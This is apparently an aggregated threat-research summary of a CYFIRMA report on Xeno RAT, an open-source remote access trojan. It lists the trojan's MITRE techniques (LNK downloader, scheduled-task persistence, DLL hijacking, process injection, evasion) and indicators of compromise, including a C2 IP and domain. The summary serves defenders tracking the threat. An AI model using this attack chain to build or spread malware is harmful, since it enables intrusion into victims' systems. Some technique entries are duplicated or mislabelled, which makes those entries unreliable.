Threat Research

Xeno RAT: A New Remote Access Trojan with Advance Capabilities – CYFIRMA

Securonix

Xeno RAT is a feature-rich remote access trojan published as an open-source project on GitHub and disseminated via its creators’ and threat actors’ use of Discord CDN. The campaign uses multi-stage payloads, anti-analysis techniques, DLL search order hijacking, and process injection to achieve persistence and C2 communication, highlighting the need for vigilant security practices. #XenoRAT #GitHub #DiscordCDN #ADExplorer64 #internal-liveapps.online

Keypoints

  • Xeno RAT is a sophisticated C# malware with advanced capabilities.
  • The malware is open-sourced on GitHub and made available for free.
  • A threat actor customized and distributed it via the Discord CDN.
  • The initial vector is a shortcut file (.lnk) disguised as a WhatsApp image acting as downloader.

MITRE Techniques

  • [T1059.003] Windows Command Shell – The lnk downloader uses the Windows command shell to retrieve, extract, and execute the payload from a zip archive. Quote: [‘The Windows command shell to retrieve, extract, and execute the payload from a zip archive, located at the Discord CDN URL.’]
  • [T1053.005] Scheduled Task – Malware adds itself as scheduled task for persistence. Quote: [‘Malware adds itself as scheduled task for persistence.’]
  • [T1204.001] Malicious Link – Primary vector is a shortcut file disguised as a WhatsApp screenshot acting as downloader. Quote: [‘The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as downloader.’]
  • [T1024.002] Malicious File – Zip archive contains multiple files including executable and DLL. Quote: [‘The zip archive contains three files, two portable executable (exe and DLL) files and one unknown file named as ‘LICENSE’.’]
  • [T1053.005] Scheduled Task – (Reinforced) Persistence through scheduled task. Quote: [‘Malware adds itself as scheduled task for persistence.’]
  • [T1622] Debugger Evasion – Uses anti-debugging/evasion techniques. Quote: [‘Utilizes anti-debugging techniques and follows a stealth operation process.’]
  • [T1497] Virtualization/Sandbox Evasion – Evades analysis via virtualization/sandbox evasion. Quote: [‘…Virtualization/Sandbox Evasion’]
  • [T1055] Process Injection – Injects into legitimate Windows processes (hh.exe, colorcpl.exe). Quote: [‘process injection’]
  • [T1622] Debugger Evasion – (Discovery context) Debugger/analysis evasion behaviors observed. Quote: [‘Debugger Evasion’]
  • [T1071.001] Web Protocols – C2 communications over obfuscated network traffic. Quote: [‘Web Protocols’]
  • [T1574.001] DLL Search Order Hijacking – Loads malicious samcli.dll by abusing DLL search order. Quote: [‘DLL search order functionality of the Windows operating system by positioning the malicious DLL with the same name in the current working directory.’]

Indicators of Compromise

  • [File] 13b1d354ac2649b309b0d9229def8091, 848020d2e8bacd35c71b78e1a81c669c9dc63c78dd3db5a97200fc87aeb44c3c – File hashes from the primary sample and downloader components
  • [File] 6f9e84087cabbb9aaa7d8aba43a84dcf, 4d0d8c2696588ff74fe7d9f8c2097fddd665308fccf16ffea23b9741a261b1c0 – Additional hashes from the Sys.zip payload
  • [File] 7704241dd8770b11b50b1448647197a5, 0aa5930aa736636fd95907328d47ea45 – Samcli.dll and LICENSE-related artifacts
  • [IP address] 45.61.139.51 – C2 server IP resolved from internal-liveapps.online
  • [Domain] internal-liveapps.online – C2 domain used by Xeno RAT

Read more: https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/